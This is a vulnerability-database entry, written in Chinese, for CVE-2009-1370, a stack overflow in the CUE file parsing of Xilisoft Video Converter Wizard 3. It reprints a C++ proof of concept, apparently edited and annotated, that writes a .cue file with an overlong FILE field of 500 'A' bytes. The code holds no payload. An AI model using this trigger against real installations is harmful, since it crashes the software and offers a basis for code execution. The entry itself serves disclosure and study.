Xilisoft Video Converter Wizard CUE 'ape_plugin.plg'文件解析栈溢出漏洞

漏洞ID 1117564 漏洞类型 缓冲区溢出
发布时间 2009-04-10 更新时间 2009-04-23
CVE编号 CVE-2009-1370 CNNVD-ID CNNVD-200904-436
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8390
https://cxsecurity.com/issue/WLB-2009040227
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-436
|漏洞详情
Xilisoft Video Converter Wizard 是用于转换各种音频和视频格式的工具。其 ape_plugin.plg 插件在解析 CUE 文件时存在栈缓冲区溢出漏洞:用户如果受骗打开特制的 CUE 文件,就会触发该溢出,可能导致任意代码执行。
|漏洞EXP
/*
----------------------------------------------------------------------------------------
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC

name: xilisoft.cpp

Credits : fl0 fl0w
----------------------------------------------------------------------------------------
Screenshot in the debugger

Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html

http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
----------------------------------------------------------------------------------------
*/

//Start

#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

/* Capacity in bytes of the two global buffers, Name and NeWbuff. */
#define     SIZE 100000

/* CUE-sheet text that main() copies into NeWbuff directly after the 500 'A' filler bytes. */
#define     FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."  

/*
 * Helper class of the generator. It holds no data members; it only groups
 * the command-line flag comparison and the usage banner.
 */
class EXPLOIT {
public:
    /* Returns Poz when the two C strings are equal, Neg otherwise. */
    int check (char *Arg_, char *_Arg);

    /* Clears the console and prints the banner and command-line syntax,
       using Name as the program name. */
    void Usage (char *Name);
};
 
/* Return values of EXPLOIT::check: Poz for a match, Neg for a mismatch. */
static int  Poz = 1;
static int  Neg = 0;
  
/* File-scope counter, zero-initialised; main() uses it as the index while filling NeWbuff. */
int i;      

/* Output file name assembled in main() from argv[2]. */
char Name [SIZE];    
/* Text written into the FILE entry of the generated .cue file; as a global it starts zero-filled. */
char NeWbuff [SIZE];
                                            

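                                                  int main (int argc, char *argv [])
{
    /*
     * Test-file generator for the CUE parsing stack overflow in Xilisoft
     * Video Converter Wizard 3 (tracked on this page as CVE-2009-1370).
     *
     * Usage: <program> -file <filename>
     *
     * Writes "<filename> .cue " holding a FILE entry whose name field is
     * 500 'A' bytes followed by FILE_FF. The output contains filler only.
     * Its distinguishing trait, useful for detection, is a FILE field far
     * longer than any plausible path.
     *
     * Returns 0 once the file is written, 1 on a usage or I/O error.
     */
    const int  kFillerLen = 500;        /* number of 'A' bytes placed before FILE_FF */
    const char kSuffix [] = " .cue ";   /* appended verbatim to the requested name */
    char       flag []    = "-file";    /* writable copy: check() takes char *, not const char * */

    EXPLOIT VIDEO;

    /* The original printed the usage text and carried on, handing a null
       argv[1] to strcmp. Stop here instead. */
    if (argc < 2) {
        VIDEO.Usage (argv [0]);
        return 1;
    }

    /* argv[2] is read below, so it must exist as well as the flag. */
    if (VIDEO.check (argv [1], flag) == Neg || argc < 3) {
        fprintf (stdout, " Incorect input ");
        /* Name is still empty at this point; the program name is what belongs here. */
        printf (" \t..Usage is %s -file filename.. \n", argv [0]);
        return 1;
    }

    /* Bound the copy into the fixed-size global before strcpy/strcat. */
    if (strlen (argv [2]) + sizeof (kSuffix) > sizeof (Name)) {
        fprintf (stderr, "Output file name is too long\n");
        return 1;
    }
    strcpy (Name, argv [2]);
    strcat (Name, kSuffix);

    for (i = 0; i < kFillerLen; ++i)
        NeWbuff [i] = 'A';

    /* NeWbuff is zero-initialised static storage, so the byte after the
       copied text is already the terminator. */
    memcpy (NeWbuff + kFillerLen, FILE_FF, strlen (FILE_FF));

    /* A runtime failure needs a runtime check: assert() disappears under NDEBUG. */
    FILE *f = fopen (Name, "w");
    if (f == NULL) {
        perror (Name);
        return 1;
    }

    /* Same bytes as the original: the opening quote is never closed. */
    fputs ("FILE \"", f);
    fprintf (f, " %s ", NeWbuff);

    if (fclose (f) != 0) {
        perror (Name);
        return 1;
    }

    fprintf (stdout, "File build ! ");
    return 0;
}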
                                                                                                    

                                                         
  
                                                  int EXPLOIT::check (char *Arg_, char *_Arg)
{
    /* Exact, case-sensitive comparison of the two C strings:
       Poz when they are equal, Neg when they differ. */
    const bool same = (strcmp (Arg_, _Arg) == 0);
    return same ? Poz : Neg;
}
        
    void EXPLOIT::Usage (char *Name)
{
    /* Clears the console, then prints the banner, the command-line syntax
       and the credit line to stdout. The parameter Name shadows the global
       buffer of the same name; here it is the program name to display. */
    system ("cls");
    fputs (" \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n ", stdout);
    fprintf (stdout, " \t..Usage is %s -file filename.. \n", Name);
    fputs ("..All Credits fl0 fl0w.. \n", stdout);
}
         
        
//EOF           

// milw0rm.com [2009-04-10]
|参考资料

来源:XF
名称:vcw-cue-bo(49807)
链接:http://xforce.iss.net/xforce/xfdb/49807
来源:BID
名称:34472
链接:http://www.securityfocus.com/bid/34472
来源:MILW0RM
名称:8390
链接:http://www.milw0rm.com/exploits/8390
来源:SECUNIA
名称:34660
链接:http://secunia.com/advisories/34660